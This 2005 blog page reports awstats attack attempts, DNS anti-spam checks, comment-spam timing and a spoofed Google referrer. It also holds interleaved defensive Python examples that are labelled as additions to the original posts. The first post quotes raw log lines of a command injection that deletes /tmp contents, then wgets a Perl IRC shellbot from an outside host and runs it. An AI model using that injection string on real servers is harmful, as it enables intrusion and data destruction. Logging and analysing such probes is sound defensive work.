
Paul's Time Sink


potential security hole in awstats [updated]

Paul Westbrook | 08 July, 2005 22:03

I noticed the following entries in my log file:

66.139.73.109 - - [09/Jul/2005:00:01:37 -0700] "GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;
rm%20-rf%20a.txt*;echo| HTTP/1.1" 200 749 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.139.73.109 - - [09/Jul/2005:00:01:38 -0700] "GET /cgi/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;
rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;
rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;
rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
66.139.73.109 - - [09/Jul/2005:00:01:39 -0700] "GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;
killall%20-9%20perl;wget%20www.mtziu.com/bam/a.txt;perl%20a.txt;echo%20;
rm%20-rf%20a.txt*;echo| HTTP/1.1" 404 1061 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

It appears that this person is attempting to have awstats download a Perl script and execute it on the web server.  When I looked at the script that it is attempting to download, it attempts to connect to an IRC server and send information there. (ClamAV identifies this script as "Trojan.Perl.Shellbot.C")
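As an added example (my own, not part of the original post and not awstats' or pLog's code), here is a small Python scanner that reads Apache combined-format log lines like the ones above and flags requests whose query-string values contain shell metacharacters after percent-decoding, which is what the `configdir=|...|` probe relies on. The sample lines are constructed and modelled on the entries above, with the download host replaced by a placeholder.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Apache "combined" log format, which is what the entries in the post use.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referrer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Characters that have no business in a query-string value handed to a CGI
# that may pass it to a shell: pipe, command separator, backtick,
# command substitution, newline.
SHELL_META = re.compile(r'[|;`\n]|\$\(|&&')


def query_params(query):
    """Split a raw query string on '&' only (never on ';', which is part of
    the payload here) and percent-decode each name and value exactly once."""
    for pair in query.split('&'):
        if pair:
            name, _, value = pair.partition('=')
            yield unquote_plus(name), unquote_plus(value)


def analyze_line(line):
    """Return a finding dict for a log line whose query carries shell
    metacharacters, or None if the line is unparsable or looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m['target'])
    tainted = [name for name, value in query_params(target.query)
               if SHELL_META.search(value)]
    if not tainted:
        return None
    return {
        'ip': m['ip'],
        'time': m['time'],
        'script': target.path.rsplit('/', 1)[-1],
        'params': tainted,
        'status': int(m['status']),
        # A 200 only says the script exists at that path; whether the
        # injected command actually ran has to be checked on the host.
        'script_present': m['status'] == '200',
    }


def scan(lines):
    """Run analyze_line over an iterable of log lines and keep the hits."""
    return [f for f in map(analyze_line, lines) if f]


# Constructed sample input: the first line is modelled on the probe in the
# post (download host replaced by a placeholder), the second is an ordinary
# awstats report request for comparison.
SAMPLE_LOG = [
    '66.139.73.109 - - [09/Jul/2005:00:01:37 -0700] '
    '"GET /awstats/awstats.pl?configdir=|echo%20;cd%20/tmp;wget%20'
    'host.invalid/a.txt;perl%20a.txt;echo| HTTP/1.1" 200 749 "-" '
    '"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '192.0.2.7 - - [09/Jul/2005:00:02:10 -0700] '
    '"GET /awstats/awstats.pl?config=example.com&output=main HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The scanner decodes each value once on purpose: decoding twice would also catch double-encoded probes, but it would equally misreport legitimate values that happen to contain a literal `%7C`.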

DNS Anti Spam plugin

Paul Westbrook | 08 July, 2005 20:09

I have just enabled the DNS Anti Spam plugin to catch comment spam that isn't stopped by the Bayesian filter.  This plugin does some DNS checks to determine if:

  1. The IP address is from a known spammer on sorbs.net, spamhaus.org, or dsbl.org.
  2. The title, body text, or the username has a URL that is known to be sent out as spam at surbl.org.
  3. The URL is known to be sent out as spam at surbl.org.
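The checks listed above map onto ordinary DNS lookups: an IP-based list is queried by reversing the address's octets and appending the list's zone, and a URI list such as SURBL is queried with the registrable domain of each URL found in the comment. Here is an added Python illustration of that logic (my own example, not the plugin's code). The zone names are assumptions based on each operator's published lists and should be checked against their current documentation; the resolver is an injected function so the example runs offline against a constructed listing.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Zone names are assumptions based on each operator's published lists;
# confirm them against current documentation before relying on them.
IP_BLOCKLISTS = ('dnsbl.sorbs.net', 'zen.spamhaus.org', 'list.dsbl.org')
URI_BLOCKLIST = 'multi.surbl.org'

URL_RE = re.compile(r'https?://[^\s<>"\']+', re.IGNORECASE)


def ip_query_name(ip, zone):
    """Build the DNSBL lookup name: IPv4 octets reversed, then the zone.
    A listed address answers with an A record in 127.0.0.0/8 (the last
    octet usually encodes which sub-list hit); an unlisted one gets NXDOMAIN."""
    addr = ipaddress.ip_address(ip)
    if addr.version != 4:
        raise ValueError('this example handles IPv4 only')
    return '.'.join(reversed(str(addr).split('.'))) + '.' + zone


def registrable_domain(host):
    """Reduce a host name to its last two labels. Real SURBL clients use the
    project's two-level and three-level TLD lists to do this properly."""
    labels = host.lower().rstrip('.').split('.')
    return '.'.join(labels[-2:])


def uri_query_name(url, zone):
    """SURBL-style lookup name: registrable domain of the URL, then the zone."""
    host = urlsplit(url).hostname or ''
    return registrable_domain(host) + '.' + zone


def check_comment(ip, title, body, username, resolve):
    """Return the reasons a comment looks like spam. `resolve(name)` must
    return the list of A records for `name`, or [] when it does not exist."""
    reasons = []
    for zone in IP_BLOCKLISTS:
        if resolve(ip_query_name(ip, zone)):
            reasons.append('poster IP listed in ' + zone)
    seen = set()
    for url in URL_RE.findall(' '.join((title, body, username))):
        name = uri_query_name(url, URI_BLOCKLIST)
        if name in seen:
            continue
        seen.add(name)
        if resolve(name):
            reasons.append(url + ' domain listed in ' + URI_BLOCKLIST)
    return reasons


def fake_resolver(listed_names):
    """Offline stand-in for a DNS client. A real one could call
    socket.gethostbyname and treat socket.gaierror as 'not listed'."""
    def resolve(name):
        return ['127.0.0.2'] if name in listed_names else []
    return resolve


# Constructed listing used for the demonstration below.
DEMO_LISTED = {
    '1.2.0.192.dnsbl.sorbs.net',
    'spam.example.multi.surbl.org',
}

if __name__ == '__main__':
    resolve = fake_resolver(DEMO_LISTED)
    print(check_comment('192.0.2.1', 'cheap stuff',
                        'visit http://www.spam.example/buy now', 'bob', resolve))
```

Each lookup is a real network round trip, so a plugin like this should cache answers (positive and negative) and treat a resolver timeout as "unknown" rather than "listed", or a DNS outage turns every comment into spam.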


blog comment spam schedule?

Paul Westbrook | 08 July, 2005 15:39

I was curious about what type of comments were being caught in the Bayesian spam filter that pLog has, so I changed my setting to keep the spam messages (still marked as spam) instead of deleting them.  One thing that I noticed is that it appears that on the 27th minute after the hour, a batch of spam comments gets posted.  (All of them are caught by the filter.)

If I have the 27th minute, I wonder who has the top of the hour.
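One way to confirm a pattern like this is to bucket the timestamps of filtered comments by minute of the hour and look for a minute whose count is far above what a uniform spread would give. This is an added Python example, not part of the post and not pLog's code; the timestamps are constructed to contain a burst at :27 every hour plus scattered single comments.

```python
from collections import Counter
from datetime import datetime, timedelta


def minute_histogram(timestamps):
    """Count spam comments per minute of the hour (0..59)."""
    return Counter(t.minute for t in timestamps)


def hot_minutes(timestamps, factor=3.0, min_count=5):
    """Minutes whose count exceeds `factor` times the uniform expectation
    (total / 60) and is at least `min_count`, so a handful of comments
    cannot look like a schedule on their own."""
    hist = minute_histogram(timestamps)
    expected = len(timestamps) / 60.0
    return sorted(m for m, c in hist.items()
                  if c >= min_count and c > factor * expected)


def sample_spam_times():
    """Constructed data: five spam comments at :27 of every hour on
    8 July 2005, plus thirty stragglers spread over other minutes."""
    start = datetime(2005, 7, 8)
    times = [start + timedelta(hours=h, minutes=27, seconds=s)
             for h in range(24) for s in range(5)]
    times += [start + timedelta(hours=i % 24, minutes=(i * 7) % 60)
              for i in range(30)]
    return times


if __name__ == '__main__':
    times = sample_spam_times()
    hist = minute_histogram(times)
    print('busiest minutes:', hist.most_common(3))
    print('hot minutes:', hot_minutes(times))
```

Run it over a week or more of filtered comments rather than a day; a single day's worth can show a false peak from one determined poster.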


Google as a referrer?

Paul Westbrook | 08 July, 2005 14:02

I have noticed someone doing something strange.  They have configured their browser to report the referrer as Google.

XXX.XX.XX.XX - - [08/Jul/2005:16:26:28 -0700] "GET /index.php?op=ViewArticle&articleId=492&blogId=2 HTTP/1.0" 200 28062 "http://www.google.com/" "Mozilla (X11; I; Linux 2.0.32 i586)"

I can't imagine that there are web servers that serve different content when the referrer is the home page of Google.  Especially since most valid referrers from Google will contain the search query.  (I really doubt that I am listed on Google's main page.)
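A simple check for this, as an added example rather than anything from the post: pull the referrer out of a combined-format line and classify it as absent, a search result (known engine host with a non-empty search term), or a bare search-engine home page, which is the anomalous case above. The mapping of engine host to query parameter is my assumption (Google uses `q`); the sample line is constructed from the one above with a documentation IP address.

```python
import shlex
from urllib.parse import urlsplit, parse_qs

# Host -> name of the query parameter that carries the search terms.
# Assumption for this example: Google uses 'q'; add other engines as needed.
SEARCH_ENGINES = {'www.google.com': 'q', 'google.com': 'q'}


def referrer_field(log_line):
    """In Apache's combined format the referrer is the second-to-last quoted
    field; shlex honours the quotes, so spaces inside fields do not matter."""
    return shlex.split(log_line)[-2]


def classify_referrer(ref):
    """'none', 'other', 'search' or 'engine-homepage'."""
    if ref in ('', '-'):
        return 'none'
    parts = urlsplit(ref)
    host = (parts.hostname or '').lower()
    param = SEARCH_ENGINES.get(host)
    if param is None:
        return 'other'
    terms = parse_qs(parts.query).get(param, [])
    if any(t.strip() for t in terms):
        return 'search'
    # Known engine host but no search terms: the odd case in the post.
    return 'engine-homepage'


# Constructed sample modelled on the line in the post.
SAMPLE_LINE = ('203.0.113.4 - - [08/Jul/2005:16:26:28 -0700] '
               '"GET /index.php?op=ViewArticle&articleId=492&blogId=2 HTTP/1.0" '
               '200 28062 "http://www.google.com/" '
               '"Mozilla (X11; I; Linux 2.0.32 i586)"')

if __name__ == '__main__':
    ref = referrer_field(SAMPLE_LINE)
    print(ref, '->', classify_referrer(ref))
```

Since the referrer is entirely client-supplied, this classification is only a hint for log review; nothing about access control should ever depend on it.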

Powered by LifeType
Design by Book of Styles